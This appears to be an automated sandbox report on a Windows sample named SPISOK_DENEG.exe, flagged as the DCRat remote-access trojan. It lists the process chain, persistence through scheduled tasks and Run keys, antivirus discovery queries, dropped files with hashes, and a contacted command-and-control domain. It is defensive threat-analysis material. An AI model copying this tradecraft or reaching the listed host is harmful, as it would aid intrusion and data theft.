                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EF9D5 SetUnhandledExceptionFilter,0_2_000EF9D5
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000EFBCA
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000F8EBD
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeMemory allocated: page read and write | page guardJump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe"Jump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"Jump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat" Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FF6.tmp" "c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EF654 cpuid 0_2_000EF654
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_000EAF0F
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeQueries volume information: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe VolumeInformationJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeQueries volume information: C:\ProviderserverruntimeperfSvc\ctfmon.exe VolumeInformationJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeQueries volume information: C:\ProviderserverruntimeperfSvc\ctfmon.exe VolumeInformation
                                  Source: C:\Users\Default\Documents\dllhost.exeQueries volume information: C:\Users\Default\Documents\dllhost.exe VolumeInformation
                                  Source: C:\Users\Default\Documents\dllhost.exeQueries volume information: C:\Users\Default\Documents\dllhost.exe VolumeInformation
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeQueries volume information: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe VolumeInformation
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeQueries volume information: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe VolumeInformation
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeQueries volume information: C:\Program Files (x86)\jDownloader\config\explorer.exe VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeQueries volume information: C:\Program Files (x86)\jDownloader\config\explorer.exe VolumeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeQueries volume information: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe VolumeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeQueries volume information: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe VolumeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeQueries volume information: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe VolumeInformation
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_000EDF1E
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000DB146 GetVersionExW,0_2_000DB146
                                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Yara detected DCRat
                                  Source: Yara matchFile source: SPISOK_DENEG.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.3.SPISOK_DENEG.exe.679d6f4.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.SPISOK_DENEG.exe.70a16f4.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.SPISOK_DENEG.exe.679d6f4.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 4.0.ChainPortsurrogate.exe.ea0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.SPISOK_DENEG.exe.70a16f4.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.1671665408.000000000674F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.1672343604.0000000007053000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000000.1740538783.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: SPISOK_DENEG.exe PID: 7576, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ChainPortsurrogate.exe PID: 7768, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\ProviderserverruntimeperfSvc\ctfmon.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\debug\backgroundTaskHost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\Default\Documents\dllhost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\config\explorer.exe, type: DROPPED

                                  Remote Access Functionality

                                  barindex
                                  Yara detected DCRat
                                  Source: Yara matchFile source: SPISOK_DENEG.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.3.SPISOK_DENEG.exe.679d6f4.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.SPISOK_DENEG.exe.70a16f4.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.SPISOK_DENEG.exe.679d6f4.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 4.0.ChainPortsurrogate.exe.ea0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.SPISOK_DENEG.exe.70a16f4.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.1671665408.000000000674F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.1672343604.0000000007053000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000000.1740538783.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: SPISOK_DENEG.exe PID: 7576, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ChainPortsurrogate.exe PID: 7768, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\ProviderserverruntimeperfSvc\ctfmon.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\debug\backgroundTaskHost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\Default\Documents\dllhost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\config\explorer.exe, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information11
                                  Scripting                                  		Valid Accounts241
                                  Windows Management Instrumentation                                  		11
                                  Scripting                                  		1
                                  DLL Side-Loading                                  		1
                                  Disable or Modify Tools                                  		OS Credential Dumping1
                                  System Time Discovery                                  		1
                                  Taint Shared Content                                  		1
                                  Archive Collected Data                                  		1
                                  Encrypted Channel                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Native API                                  		1
                                  DLL Side-Loading                                  		11
                                  Process Injection                                  		1
                                  Deobfuscate/Decode Files or Information                                  		LSASS Memory3
                                  File and Directory Discovery                                  		Remote Desktop ProtocolData from Removable Media1
                                  Non-Application Layer Protocol                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts2
                                  Command and Scripting Interpreter                                  		1
                                  Scheduled Task/Job                                  		1
                                  Scheduled Task/Job                                  		2
                                  Obfuscated Files or Information                                  		Security Account Manager57
                                  System Information Discovery                                  		SMB/Windows Admin SharesData from Network Shared Drive1
                                  Application Layer Protocol                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts1
                                  Scheduled Task/Job                                  		31
                                  Registry Run Keys / Startup Folder                                  		31
                                  Registry Run Keys / Startup Folder                                  		1
                                  Software Packing                                  		NTDS251
                                  Security Software Discovery                                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                  DLL Side-Loading                                  		LSA Secrets1
                                  Process Discovery                                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                  File Deletion                                  		Cached Domain Credentials151
                                  Virtualization/Sandbox Evasion                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
                                  Masquerading                                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                                  Virtualization/Sandbox Evasion                                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                  Process Injection                                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590008 Sample: SPISOK_DENEG.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 79 77777cm.nyashtyan.in 2->79 81 Suricata IDS alerts for network traffic 2->81 83 Found malware configuration 2->83 85 Antivirus detection for dropped file 2->85 87 13 other signatures 2->87 12 SPISOK_DENEG.exe 3 6 2->12         started        15 ctfmon.exe 3 2->15         started        18 dllhost.exe 2->18         started        20 8 other processes 2->20 signatures3 process4 file5 75 C:\...\ChainPortsurrogate.exe, PE32 12->75 dropped 77 C:\...\4oe8qKx4BC4jNir9oLrOplwqP.vbe, data 12->77 dropped 22 wscript.exe 1 12->22         started        103 Antivirus detection for dropped file 15->103 105 Multi AV Scanner detection for dropped file 15->105 107 Machine Learning detection for dropped file 15->107 signatures6 process7 signatures8 93 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->93 25 cmd.exe 1 22->25         started        process9 process10 27 ChainPortsurrogate.exe 13 28 25->27         started        31 conhost.exe 25->31         started        33 Conhost.exe 25->33         started        file11 67 C:\Windows\debug\backgroundTaskHost.exe, PE32 27->67 dropped 69 C:\Users\user\Desktop\tHgRxHTS.log, PE32 27->69 dropped 71 C:\Users\user\Desktop\jYNBNfNl.log, PE32 27->71 dropped 73 9 other malicious files 27->73 dropped 95 Antivirus detection for dropped file 27->95 97 Multi AV Scanner detection for dropped file 27->97 99 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 27->99 101 7 other signatures 27->101 35 csc.exe 4 27->35         started        39 schtasks.exe 27->39         started        41 cmd.exe 27->41         started        43 17 other processes 27->43 signatures12 process13 file14 65 C:\Windows\...\SecurityHealthSystray.exe, PE32 35->65 dropped 89 Infects executable files (exe, dll, sys, html) 35->89 45 conhost.exe 35->45         started        47 cvtres.exe 1 35->47         started        91 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 39->91 49 conhost.exe 41->49         started        51 chcp.com 41->51         started        53 w32tm.exe 41->53         started        55 ChainPortsurrogate.exe 41->55         started        57 conhost.exe 43->57         started        59 Conhost.exe 43->59         started        61 Conhost.exe 43->61         started        signatures15 process16 process17 63 Conhost.exe 49->63         started       

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  SPISOK_DENEG.exe58%VirustotalBrowse
                                  SPISOK_DENEG.exe74%ReversingLabsWin32.Trojan.Uztuby
                                  SPISOK_DENEG.exe100%AviraVBS/Runner.VPG
                                  SPISOK_DENEG.exe100%Joe Sandbox ML

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\ProviderserverruntimeperfSvc\ctfmon.exe100%AviraHEUR/AGEN.1309961
                                  C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe100%AviraVBS/Runner.VPG
                                  C:\Windows\debug\backgroundTaskHost.exe100%AviraHEUR/AGEN.1309961
                                  C:\Program Files (x86)\jDownloader\config\explorer.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat100%AviraBAT/Delbat.C
                                  C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\Default\Documents\dllhost.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\user\Desktop\UxRLAXDP.log100%AviraTR/PSW.Agent.qngqt
                                  C:\Users\user\Desktop\CqAggkYA.log100%AviraTR/AVI.Agent.updqb
                                  C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe100%AviraHEUR/AGEN.1309961
                                  C:\ProviderserverruntimeperfSvc\ctfmon.exe100%Joe Sandbox ML
                                  C:\Windows\debug\backgroundTaskHost.exe100%Joe Sandbox ML
                                  C:\Program Files (x86)\jDownloader\config\explorer.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\tHgRxHTS.log100%Joe Sandbox ML
                                  C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe100%Joe Sandbox ML
                                  C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                  C:\Users\Default\Documents\dllhost.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\UxRLAXDP.log100%Joe Sandbox ML
                                  C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe100%Joe Sandbox ML
                                  C:\Program Files (x86)\jDownloader\config\explorer.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\ProviderserverruntimeperfSvc\ctfmon.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\Default\Documents\dllhost.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\CqAggkYA.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\UxRLAXDP.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\YsSdHCtI.log25%ReversingLabs
                                  C:\Users\user\Desktop\jYNBNfNl.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\tHgRxHTS.log29%ReversingLabsWin32.Trojan.Generic
                                  C:\Windows\debug\backgroundTaskHost.exe78%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  No Antivirus matches

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  77777cm.nyashtyan.in
                                  		104.21.16.1
                                  		truetrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameChainPortsurrogate.exe, 00000004.00000002.1795261903.00000000033B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      No contacted IP infos

                                      General Information

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1590008
                                      Start date and time:2025-01-13 13:25:08 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 46s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:60
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:SPISOK_DENEG.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.expl.evad.winEXE@56/33@1/0
                                      EGA Information:
                                      • Successful, ratio: 15.4%
                                      HCA Information:
                                      • Successful, ratio: 93%
                                      • Number of executed functions: 310
                                      • Number of non-executed functions: 92
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, backgroundTaskHost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target ChainPortsurrogate.exe, PID 2596 because it is empty
                                      • Execution Graph export aborted for target ChainPortsurrogate.exe, PID 7644 because it is empty
                                      • Execution Graph export aborted for target ChainPortsurrogate.exe, PID 7736 because it is empty
                                      • Execution Graph export aborted for target EbnrVuXczrPqjyiJGoZ.exe, PID 4180 because it is empty
                                      • Execution Graph export aborted for target EbnrVuXczrPqjyiJGoZ.exe, PID 4504 because it is empty
                                      • Execution Graph export aborted for target ctfmon.exe, PID 2196 because it is empty
                                      • Execution Graph export aborted for target ctfmon.exe, PID 7884 because it is empty
                                      • Execution Graph export aborted for target dllhost.exe, PID 1804 because it is empty
                                      • Execution Graph export aborted for target dllhost.exe, PID 5496 because it is empty
                                      • Execution Graph export aborted for target explorer.exe, PID 1740 because it is empty
                                      • Execution Graph export aborted for target explorer.exe, PID 5568 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      12:26:08Task SchedulerRun new task: ctfmonc path: "C:\ProviderserverruntimeperfSvc\ctfmon.exe"
                                      12:26:11Task SchedulerRun new task: backgroundTaskHost path: "C:\Windows\debug\backgroundTaskHost.exe"
                                      12:26:11Task SchedulerRun new task: backgroundTaskHostb path: "C:\Windows\debug\backgroundTaskHost.exe"
                                      12:26:11Task SchedulerRun new task: ctfmon path: "C:\ProviderserverruntimeperfSvc\ctfmon.exe"
                                      12:26:11Task SchedulerRun new task: dllhost path: "C:\Users\Default User\Documents\dllhost.exe"
                                      12:26:11Task SchedulerRun new task: dllhostd path: "C:\Users\Default User\Documents\dllhost.exe"
                                      12:26:11Task SchedulerRun new task: EbnrVuXczrPqjyiJGoZ path: "C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe"
                                      12:26:11Task SchedulerRun new task: EbnrVuXczrPqjyiJGoZE path: "C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe"
                                      12:26:11Task SchedulerRun new task: explorer path: "C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                      12:26:11Task SchedulerRun new task: explorere path: "C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                      12:26:13Task SchedulerRun new task: ChainPortsurrogate path: "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
                                      12:26:14Task SchedulerRun new task: ChainPortsurrogateC path: "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
                                      12:26:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\ProviderserverruntimeperfSvc\ctfmon.exe"
                                      12:26:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                      12:26:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Users\Default User\Documents\dllhost.exe"
                                      12:26:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Windows\debug\backgroundTaskHost.exe"
                                      12:26:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run EbnrVuXczrPqjyiJGoZ "C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe"
                                      12:26:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogate "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
                                      12:27:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\ProviderserverruntimeperfSvc\ctfmon.exe"
                                      12:27:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                      12:27:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Users\Default User\Documents\dllhost.exe"
                                      12:27:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Windows\debug\backgroundTaskHost.exe"
                                      12:27:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run EbnrVuXczrPqjyiJGoZ "C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe"
                                      12:27:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogate "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
                                      12:27:52AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\ProviderserverruntimeperfSvc\ctfmon.exe"
                                      12:28:00AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                      12:28:08AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Users\Default User\Documents\dllhost.exe"

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      77777cm.nyashtyan.in01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                      • 188.114.97.3

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\Desktop\CqAggkYA.logDCobxod.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        fatality.exeGet hashmaliciousCryptOne, DCRat, Mofksys, PureLog Stealer, zgRATBrowse
                                          NursultanAlphaCrack.bat.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            SearchIndexer.exeGet hashmaliciousDCRat, Neshta, PureLog Stealer, zgRATBrowse
                                              fatality.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                OneDriveStandaloneUpdater.exeGet hashmaliciousDCRatBrowse
                                                  85D5ktqjpd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    VIyu4dC9CU.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      top.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        DC86.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                          Created / dropped Files

                                                          C:\Program Files (x86)\jDownloader\config\7a0fd90576e088

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):116
                                                          Entropy (8bit):5.549243602643733
                                                          Encrypted:false
                                                          SSDEEP:3:yJ3ieZ9FhkuAjTkFtS/vHWd1gkUUfyFgVSLvTbqBb:CFjFtSnuo3FTvQ
                                                          MD5:440F3FFAAF6D441BF410AE8CABC777B4
                                                          SHA1:108CA4D69165AC5C4FCEE8CBF7A63B835B6A479D
                                                          SHA-256:F126BA721E6E32CFFD181FACEEF76E508E298B24E9591951EF17E0295D86F9A0
